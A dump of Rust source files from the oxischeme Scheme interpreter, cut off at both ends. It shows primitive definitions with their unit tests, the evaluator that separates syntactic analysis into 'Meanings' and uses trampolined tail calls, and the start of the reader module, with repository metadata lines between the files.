symbol_question); define_primitive(env, act, "number?", number_question); define_primitive(env, act, "string?", string_question); define_primitive(env, act, "=", number_equal); define_primitive(env, act, ">", gt); define_primitive(env, act, "<", lt); define_primitive(env, act, "+", add); define_primitive(env, act, "-", subtract); define_primitive(env, act, "/", divide); define_primitive(env, act, "*", multiply); } // TESTS ----------------------------------------------------------------------- #[cfg(test)] mod tests { use eval::{evaluate_file}; use heap::{Heap}; use value::{Value}; #[test] fn test_primitives_cons() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_cons.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cdr(heap), Value::new_integer(2)); } #[test] fn test_primitives_car() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_car.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(1)); } #[test] fn test_primitives_set_car() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_set_car.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cdr(heap), Value::new_integer(2)); } #[test] fn test_primitives_cdr() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_cdr.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(2)); } #[test] fn test_primitives_set_cdr() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_set_cdr.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cdr(heap), Value::new_integer(2)); } #[test] fn test_primitives_list() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_list.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_integer(1)); assert_eq!(*pair.cadr(heap).ok().expect("pair.cadr"), Value::new_integer(2)); assert_eq!(*pair.caddr(heap).ok().expect("pair.caddr"), Value::new_integer(3)); assert_eq!(*pair.cdddr(heap).ok().expect("pair.cdddr"), Value::EmptyList); } #[test] fn test_primitives_length() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_length.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(3)); } #[test] fn test_primitives_apply() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_apply.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(3)); } #[test] fn test_primitives_error() { let heap = &mut Heap::new(); let error = evaluate_file(heap, "./tests/test_primitives_error.scm") .err() .expect("Should get an error evaluating this file."); assert_eq!(error, "./tests/test_primitives_error.scm:1:1:\n\ ERROR!\n\ \t\"got an error:\"\n\ \t(1 2)"); } #[test] fn test_primitives_not() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_not.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_null() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_null.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_arithmetic() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_arithmetic.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(42)); } #[test] fn test_primitives_pair() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_pair.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_atom() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_atom.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_eq() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_eq.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_symbol_question() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_symbol_question.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_number_question() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_number_question.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_string_question() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_string_question.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_number_equal() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_number_equal.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_gt() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_gt.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } #[test] fn test_primitives_lt() { let heap = &mut Heap::new(); let result = evaluate_file(heap, "./tests/test_primitives_lt.scm") .ok() .expect("Should be able to eval a file."); let pair = result.to_pair(heap) .expect("Result should be a pair"); assert_eq!(*pair.car(heap), Value::new_boolean(true)); assert_eq!(*pair.cdr(heap), Value::new_boolean(false)); } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/eval.rs
src/eval.rs
// Copyright 2015 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Oxischeme is an interpreter, but it is not a naiive AST walking //! interpreter. In contrast to an AST walking interpreter, syntactic analysis //! is separated from execution, so that no matter how many times an expression //! might be evaluated, it is only ever analyzed once. //! //! When evaluating a form, first we `analyze` it to derive its semantic //! `Meaning`. The meanings form an intermediate language containing everything //! we statically know about the expression, such as whether it is a conditional //! or a lambda form, or the location of a value bound to a variable name, so //! that we don't need to compute these things at execution time. After analysis //! has produced a meaning for the form, the meaning is then interpreted. This //! approach results in a speed up in the realm of 10 - 50 times faster than //! simple AST-walking evaluation. //! //! In SICP and LiSP, the implementation language is also Scheme, and the //! meanings are just elegant closures. Because we cannot rely on the host //! language's GC like they can, we require more fine-grained control of the data //! and its lifetime. Therefore, we explicitly model all data that can be //! statically gathered in the `MeaningData` type. Evaluation of each special //! form is implemented by two things: first, a variant in `MeaningData`, and //! secondly a `MeaningEvaluatorFn` function that takes the heap, an activation, //! and the meaning data for that form. The simplest example is quoted forms: we //! determine the quoted value during analysis and at runtime simply return it. //! //! enum MeaningData { //! ... //! Quotation(RootedValue), //! ... //! } //! //! fn evaluate_quotation(heap: &mut Heap, //! data: &MeaningData, //! act: &mut RootedActivationPtr) -> TrampolineResult { //! if let MeaningData::Quotation(ref val) = *data { //! return Ok(Trampoline::Value(Rooted::new(heap, **val))); //! } //! //! panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); //! } //! //! //! ## References //! //! * ["Separating Syntactic Analysis from Execution"](https://mitpress.mit.edu/sicp/full-text/sicp/book/node83.html), //! chapter 4.1.7 of *Structure and Interpretation of Computer Programs* by //! Abelson et all //! //! * "Fast Interpretation", chapter 6 in *Lisp In Small Pieces* by Christian //! Queinnec extern crate test; use std::cmp::{Ordering}; use std::fmt; use std::hash; use environment::{Activation, RootedActivationPtr}; use heap::{Heap, Rooted}; use read::{Location}; use value::{RootedValue, SchemeResult, Value}; /// Evaluate the given form in the global environment. pub fn evaluate(heap: &mut Heap, form: &RootedValue, location: Location) -> SchemeResult { let meaning = try!(analyze(heap, form, location)); let mut act = heap.global_activation(); meaning.evaluate(heap, &mut act) } /// Evaluate the file at the given path and return the value of the last form. pub fn evaluate_file(heap: &mut Heap, file_path: &str) -> SchemeResult { use read::read_from_file; let reader = match read_from_file(file_path, heap) { Ok(r) => r, Err(e) => { return Err(format!("Error: evaluate_file could not read {}: {}", file_path, e)); }, }; let mut result = Rooted::new(heap, Value::EmptyList); for (location, read_result) in reader { let form = try!(read_result); result.emplace(*try!(evaluate(heap, &form, location))); } return Ok(result); } /// To optimize tail calls and eliminate the stack frames that would otherwise /// be used by them, we trampoline thunks in a loop and encode that process in /// this type. #[derive(Debug)] pub enum Trampoline { Value(RootedValue), Thunk(RootedActivationPtr, Meaning), } impl Trampoline { /// Keep evaluating thunks until it yields a value. pub fn run(self, heap: &mut Heap) -> SchemeResult { match self { Trampoline::Value(v) => { return Ok(v); }, Trampoline::Thunk(act, meaning) => { let mut a = act; let mut m = meaning; loop { match try!(m.evaluate_to_thunk(heap, &mut a)) { Trampoline::Value(v) => { return Ok(v); }, Trampoline::Thunk(aa, mm) => { a = aa; m = mm; }, } } } } } } /// Either a `Trampoline`, or a `String` describing the error. pub type TrampolineResult = Result<Trampoline, String>; /// The set of data generated by our syntactic analysis pretreatment. #[derive(Clone, Hash, Debug)] enum MeaningData { /// The quoted value. Quotation(RootedValue), /// A reference to (i'th activation, j'th binding, original name). Reference(u32, u32, String), /// Push a new binding to the current activation with the value of the given /// meaning. Definition(u32, u32, Meaning), /// Set the (i'th activation, j'th binding) to the value of the given /// meaning. SetVariable(u32, u32, Meaning), /// Condition, consequent, and alternative. Conditional(Meaning, Meaning, Meaning), /// Evaluate the first meaning (presumable for side-effects, before /// evaluating and returning the second meaning. Sequence(Meaning, Meaning), /// Arity and body. Lambda(u32, Meaning), /// Procedure and parameters. Invocation(Meaning, Vec<Meaning>), } impl fmt::Display for MeaningData { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { MeaningData::Quotation(ref val) => { write!(f, "(quotation {})", **val) }, MeaningData::Reference(i, j, ref name) => { write!(f, "(reference {} {} {})", i, j, name) }, MeaningData::Definition(i, j, ref val) => { write!(f, "(definition {} {} {})", i, j, val) }, MeaningData::SetVariable(i, j, ref val) => { write!(f, "(set-variable {} {} {})", i, j, val) }, MeaningData::Conditional(ref condition, ref consequent, ref alternative) => { write!(f, "(conditional {} {} {})", condition, consequent, alternative) }, MeaningData::Sequence(ref first, ref second) => { write!(f, "(sequence {} {})", first, second) }, MeaningData::Lambda(arity, ref body) => { write!(f, "(lambda {} {})", arity, body) }, MeaningData::Invocation(ref procedure, ref arguments) => { try!(write!(f, "(invocation {} [", procedure)); let mut is_first = true; for arg in arguments.iter() { try!(write!(f, "{}{}", if is_first { "" } else { " " }, arg)); is_first = false; } write!(f, "])") }, } } } /// Type signature for the evaulator functions which evaluate only a specific /// syntactic form. type MeaningEvaluatorFn = fn(&mut Heap, &MeaningData, &mut RootedActivationPtr) -> TrampolineResult; impl fmt::Debug for MeaningEvaluatorFn { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "0x{:x}", *self as usize) } } #[allow(unused_variables)] fn evaluate_quotation(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Quotation(ref val) = *data { return Ok(Trampoline::Value(Rooted::new(heap, **val))); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_reference(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Reference(i, j, ref name) = *data { let val = try!(act.fetch(heap, i, j).ok().ok_or( format!("Reference to variable that hasn't been defined: {}", name))); return Ok(Trampoline::Value(val)); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_definition(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Definition(i, j, ref definition_value_meaning) = *data { debug_assert!(i == 0, "Definitions should always be in the youngest activation"); let val = try!(definition_value_meaning.evaluate(heap, act)); act.define(j, *val); return Ok(Trampoline::Value(heap.unspecified_symbol())); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_set_variable(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::SetVariable(i, j, ref definition_value_meaning) = *data { let val = try!(definition_value_meaning.evaluate(heap, act)); try!(act.update(i, j, &val).ok().ok_or( "Cannot set variable before it has been defined".to_string())); return Ok(Trampoline::Value(heap.unspecified_symbol())); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_conditional(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Conditional(ref condition, ref consequent, ref alternative) = *data { let val = try!(condition.evaluate(heap, act)); return Ok(Trampoline::Thunk(Rooted::new(heap, **act), if *val == Value::new_boolean(false) { (*alternative).clone() } else { (*consequent).clone() })); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_sequence(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Sequence(ref first, ref second) = *data { try!(first.evaluate(heap, act)); return Ok(Trampoline::Thunk(Rooted::new(heap, **act), second.clone())); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } fn evaluate_lambda(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Lambda(arity, ref body) = *data { return Ok(Trampoline::Value( Value::new_procedure(heap, arity, act, (*body).clone()))); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } pub fn apply_invocation(heap: &mut Heap, proc_val: &RootedValue, args: Vec<RootedValue>) -> TrampolineResult { match **proc_val { Value::Primitive(primitive) => { return primitive.call(heap, args); }, Value::Procedure(proc_ptr) => { match proc_ptr.arity.cmp(&(args.len() as u32)) { Ordering::Less => { return Err("Error: too many arguments passed".to_string()); }, Ordering::Greater => { return Err("Error: too few arguments passed".to_string()); }, _ => { let proc_act = proc_ptr.act.as_ref() .expect("Should never see an uninitialized procedure!"); let rooted_proc_act = Rooted::new(heap, *proc_act); let body = proc_ptr.body.as_ref() .expect("Should never see an uninitialized procedure!"); let new_act = Activation::extend(heap, &rooted_proc_act, args); return Ok(Trampoline::Thunk(new_act, (**body).clone())); }, } }, _ => { return Err(format!("Error: expected a procedure to call, found {}", **proc_val)); } } } fn evaluate_invocation(heap: &mut Heap, data: &MeaningData, act: &mut RootedActivationPtr) -> TrampolineResult { if let MeaningData::Invocation(ref procedure, ref params) = *data { let proc_val = try!(procedure.evaluate(heap, act)); let args = try!(params.iter().map(|p| p.evaluate(heap, act)).collect()); return apply_invocation(heap, &proc_val, args); } panic!("unsynchronized MeaningData and MeaningEvaluatorFn"); } /// The `Meaning` type is our intermediate language produced by syntactic /// analysis. It is a triple containing a `MeaningData` variant, its /// corresponding `MeaningEvaluatorFn`, and the source location this `Meaning` /// originates from. #[derive(Debug)] pub struct Meaning { data: Box<MeaningData>, evaluator: MeaningEvaluatorFn, location: Location, } /// ## `Meaning` Constructors impl Meaning { fn new_quotation(form: &RootedValue, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Quotation((*form).clone())), evaluator: evaluate_quotation, location: location } } fn new_reference(i: u32, j: u32, name: String, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Reference(i, j, name)), evaluator: evaluate_reference, location: location } } fn new_set_variable(i: u32, j: u32, val: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::SetVariable(i, j, val)), evaluator: evaluate_set_variable, location: location, } } fn new_conditional(condition: Meaning, consquent: Meaning, alternative: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Conditional(condition, consquent, alternative)), evaluator: evaluate_conditional, location: location, } } fn new_sequence(first: Meaning, second: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Sequence(first, second)), evaluator: evaluate_sequence, location: location, } } fn new_definition(i: u32, j: u32, defined: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Definition(i, j, defined)), evaluator: evaluate_definition, location: location, } } fn new_lambda(arity: u32, body: Meaning, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Lambda(arity, body)), evaluator: evaluate_lambda, location: location, } } fn new_invocation(procedure: Meaning, params: Vec<Meaning>, location: Location) -> Meaning { Meaning { data: Box::new(MeaningData::Invocation(procedure, params)), evaluator: evaluate_invocation, location: location } } } /// ## `Meaning` Methods impl Meaning { /// Evaluate this form no further than until the next thunk. #[inline] fn evaluate_to_thunk(&self, heap: &mut Heap, act: &mut RootedActivationPtr) -> TrampolineResult { match (self.evaluator)(heap, &*self.data, act) { // Add this location to the error message. These stack up and give a // backtrace. Err(e) => Err(format!("{}:\n{}", self.location, e)), ok => ok } } /// Evaluate this form completely, trampolining all thunks until a value is /// produced. fn evaluate(&self, heap: &mut Heap, act: &mut RootedActivationPtr) -> SchemeResult { let thunk = try!(self.evaluate_to_thunk(heap, act)); thunk.run(heap) } } impl Clone for Meaning { fn clone(&self) -> Self { Meaning { data: self.data.clone(), evaluator: self.evaluator, location: self.location.clone(), } } } impl fmt::Display for Meaning { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", *self.data) } } impl hash::Hash for Meaning { fn hash<H: hash::Hasher>(&self, state: &mut H) { let u = self.evaluator as usize; u.hash(state); self.data.hash(state); } } /// Either a `Meaning`, or a `String` explaining the error. pub type MeaningResult = Result<Meaning, String>; /// The main entry point for syntactic analysis. pub fn analyze(heap: &mut Heap, form: &RootedValue, location: Location) -> MeaningResult { if form.is_atom() { return analyze_atom(heap, form, location); } let pair = form.to_pair(heap).expect( "If a value is not an atom, then it must be a pair."); let quote = heap.quote_symbol(); let if_symbol = heap.if_symbol(); let begin = heap.begin_symbol(); let define = heap.define_symbol(); let set_bang = heap.set_bang_symbol(); let lambda = heap.lambda_symbol(); match *pair.car(heap) { v if v == *quote => analyze_quoted(heap, form), v if v == *define => analyze_definition(heap, form), v if v == *set_bang => analyze_set(heap, form), v if v == *lambda => analyze_lambda(heap, form), v if v == *if_symbol => analyze_conditional(heap, form), v if v == *begin => analyze_sequence(heap, form), _ => analyze_invocation(heap, form), } } /// Return true if the form doesn't need to be evaluated because it is /// "autoquoting" or "self evaluating", false otherwise. fn is_auto_quoting(form: &RootedValue) -> bool { match **form { Value::EmptyList => false, Value::Pair(_) => false, Value::Symbol(_) => false, _ => true, } } fn analyze_atom(heap: &mut Heap, form: &RootedValue, location: Location) -> MeaningResult { if is_auto_quoting(form) { return Ok(Meaning::new_quotation(form, location)); } if let Some(sym) = form.to_symbol(heap) { if let Some((i, j)) = heap.environment.lookup(&**sym) { return Ok(Meaning::new_reference(i, j, (**sym).clone(), location)); } // This is a reference to a global variable that hasn't been defined // yet. let (i, j) = heap.environment.define_global((**sym).clone()); return Ok(Meaning::new_reference(i, j, (**sym).clone(), location)); } return Err(format!("Static error: Cannot evaluate: {}", **form)); } fn analyze_quoted(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(2) = form.len() { let pair = form.to_pair(heap).unwrap(); return Ok(Meaning::new_quotation( &form.cdr(heap).unwrap().car(heap).unwrap(), heap.locate(&pair))); } let msg = "Static error: Wrong number of parts in quoted form"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}", heap.locate(&pair), msg) } else { msg.to_string() }) } fn analyze_definition(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(3) = form.len() { let pair = form.to_pair(heap).expect( "If len = 3, then form must be a pair"); let sym = try!(pair.cadr(heap)); let location = heap.locate(&pair); if let Some(str) = sym.to_symbol(heap) { let def_value_form = try!(pair.caddr(heap)); let def_value_meaning = try!(analyze(heap, &def_value_form, location.clone())); let (i, j) = heap.environment.define((**str).clone()); return Ok(Meaning::new_definition(i, j, def_value_meaning, location)); } return Err(format!("{}: Static error: can only define symbols, found: {}", location, *sym)); } let msg = "Static error: improperly formed definition"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } fn analyze_set(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(3) = form.len() { let pair = form.to_pair(heap).expect( "If len = 3, then form must be a pair"); let sym = try!(pair.cadr(heap)); let location = heap.locate(&pair); if let Some(str) = sym.to_symbol(heap) { let set_value_form = try!(pair.caddr(heap)); let set_value_meaning = try!(analyze(heap, &set_value_form, location.clone())); if let Some((i, j)) = heap.environment.lookup(&**str) { return Ok(Meaning::new_set_variable(i, j, set_value_meaning, location)); } // This is setting a global variable that isn't defined yet, but // could be defined later. The check will happen at evaluation time. let (i, j) = heap.environment.define_global((**str).clone()); return Ok(Meaning::new_set_variable(i, j, set_value_meaning, location)); } return Err(format!("{}: Static error: can only set! symbols, found: {}", location, *sym)); } let msg = "Static error: improperly formed set!"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } fn analyze_lambda(heap: &mut Heap, form: &RootedValue) -> MeaningResult { let length = try!(form.len().ok().ok_or_else(|| { let msg = "Static error: improperly formed lambda"; if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) } })); if length < 3 { let msg = "Static error: improperly formed lambda"; return Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } let pair = form.to_pair(heap).unwrap(); let location = heap.locate(&pair); let body = pair.cddr(heap) .ok().expect("Must be here since length >= 3"); let mut params = vec!(); let mut arity = 0; let params_form = pair.cadr(heap).ok().expect( "Must be here since length >= 3"); for p in params_form.iter() { arity += 1; params.push(try!(p.ok().ok_or(format!("{}: Bad lambda parameters: {}", location, *params_form)))); } let mut param_names : Vec<String> = try!(params.into_iter().map(|p| { let sym = try!(p.to_symbol(heap) .ok_or(format!("{}: Can only define symbol parameters, found {}", location, p))); Ok((**sym).clone()) }).collect()); // Find any definitions in the body, so we can add them to the extended // environment. let define = heap.define_symbol(); let mut local_definitions : Vec<String> = body.iter() .filter_map(|form_result| { if let Ok(form) = form_result { if let Some(pair) = form.to_pair(heap) { if pair.car(heap) == define { if let Ok(name) = pair.cadr(heap) { return name.to_symbol(heap).map(|s| (**s).clone()) } } } } None }) .collect(); let mut new_bindings = Vec::with_capacity(param_names.len() + local_definitions.len()); new_bindings.append(&mut param_names); new_bindings.append(&mut local_definitions); let body_meaning = try!(heap.with_extended_env(new_bindings, &|heap| { make_meaning_sequence(heap, &body) })); return Ok(Meaning::new_lambda(arity as u32, body_meaning, location)); } fn analyze_conditional(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Ok(4) = form.len() { let pair = form.to_pair(heap).expect( "If len = 4, then form must be a pair"); let location = heap.locate(&pair); let condition_form = try!(pair.cadr(heap)); let condition_meaning = try!(analyze(heap, &condition_form, location.clone())); let consequent_form = try!(pair.caddr(heap)); let consequent_meaning = try!(analyze(heap, &consequent_form, location.clone())); let alternative_form = try!(pair.cadddr(heap)); let alternative_meaning = try!(analyze(heap, &alternative_form, location.clone())); return Ok(Meaning::new_conditional(condition_meaning, consequent_meaning, alternative_meaning, location)); } let msg = "Static error: improperly if expression"; Err(if let Some(pair) = form.to_pair(heap) { format!("{}: {}: {}", heap.locate(&pair), msg, **form) } else { format!("{}: {}", msg, **form) }) } fn make_meaning_sequence(heap: &mut Heap, forms: &RootedValue) -> MeaningResult { if let Some(ref cons) = forms.to_pair(heap) { let first_form = cons.car(heap); let location = heap.locate(cons); let first = try!(analyze(heap, &first_form, location.clone())); if *cons.cdr(heap) == Value::EmptyList { return Ok(first); } else { let rest_forms = cons.cdr(heap); let rest = try!(make_meaning_sequence(heap, &rest_forms)); return Ok(Meaning::new_sequence(first, rest, location)); } } Err(format!("Static error: improperly formed sequence: {}", **forms)) } fn analyze_sequence(heap: &mut Heap, form: &RootedValue) -> MeaningResult { let forms = try!(form.cdr(heap).ok_or( format!("Static error: improperly formed sequence: {}", **form))); make_meaning_sequence(heap, &forms) } fn make_meaning_vector(heap: &mut Heap, forms: &RootedValue, mut meanings: Vec<Meaning>) -> Result<Vec<Meaning>, String> { match **forms { Value::EmptyList => Ok(meanings), Value::Pair(ref cons) => { let car = cons.car(heap); let rest = cons.cdr(heap); let pair = forms.to_pair(heap).unwrap(); let location = heap.locate(&pair); meanings.push(try!(analyze(heap, &car, location))); make_meaning_vector(heap, &rest, meanings) }, _ => { panic!("Passed improper list to `make_meaning_vector`!"); } } } fn analyze_invocation(heap: &mut Heap, form: &RootedValue) -> MeaningResult { if let Some(ref cons) = form.to_pair(heap) { let location = heap.locate(cons); let proc_form = cons.car(heap); let proc_meaning = try!(analyze(heap, &proc_form, location.clone())); let params_form = cons.cdr(heap); let arity = try!(params_form.len().ok().ok_or( "Static error: improperly formed invocation".to_string())); let params_meaning = try!(make_meaning_vector( heap, &params_form, Vec::with_capacity(arity as usize))); return Ok(Meaning::new_invocation(proc_meaning, params_meaning, location)); } return Err(format!("Static error: improperly formed invocation: {}", **form)); } // TESTS ----------------------------------------------------------------------- #[cfg(test)] mod tests { use super::*; use heap::{Heap, Rooted}; use read::{Location}; use value::{list, Value}; #[test] fn test_eval_integer() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_integer.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(42)); } #[test] fn test_eval_boolean() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_boolean.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_boolean(true)); } #[test] fn test_eval_quoted() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_quoted.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::EmptyList); } #[test] fn test_eval_if_consequent() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_if_consequent.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(1)); } #[test] fn test_eval_if_alternative() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_if_alternative.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(2)); } #[test] fn test_eval_begin() { let mut heap = Heap::new(); let result = evaluate_file(&mut heap, "./tests/test_eval_begin.scm") .ok() .expect("Should be able to eval a file."); assert_eq!(*result, Value::new_integer(2)); } #[test] fn test_eval_variables() { let heap = &mut Heap::new(); let define_symbol = heap.define_symbol(); let set_bang_symbol = heap.set_bang_symbol(); let foo_symbol = heap.get_or_create_symbol("foo".to_string()); let mut def_items = [
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
true
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/read.rs
src/read.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! Parsing values. use std::cell::{RefCell}; use std::fmt; use std::iter::{Peekable}; use std::old_io::{BufferedReader, File, IoError, IoErrorKind, IoResult, MemReader}; use heap::{Heap, Rooted}; use value::{list, RootedValue, SchemeResult, Value}; /// `CharReader` reads characters one at a time from the given input `Reader`. struct CharReader<R> { reader: BufferedReader<R>, } impl<R: Reader> CharReader<R> { /// Create a new `CharReader` instance. pub fn new(reader: R) -> CharReader<R> { CharReader { reader: BufferedReader::new(reader) } } } impl<R: Reader> Iterator for CharReader<R> { type Item = char; /// Returns `Some(c)` for each character `c` from the input reader. Upon /// reaching EOF, returns 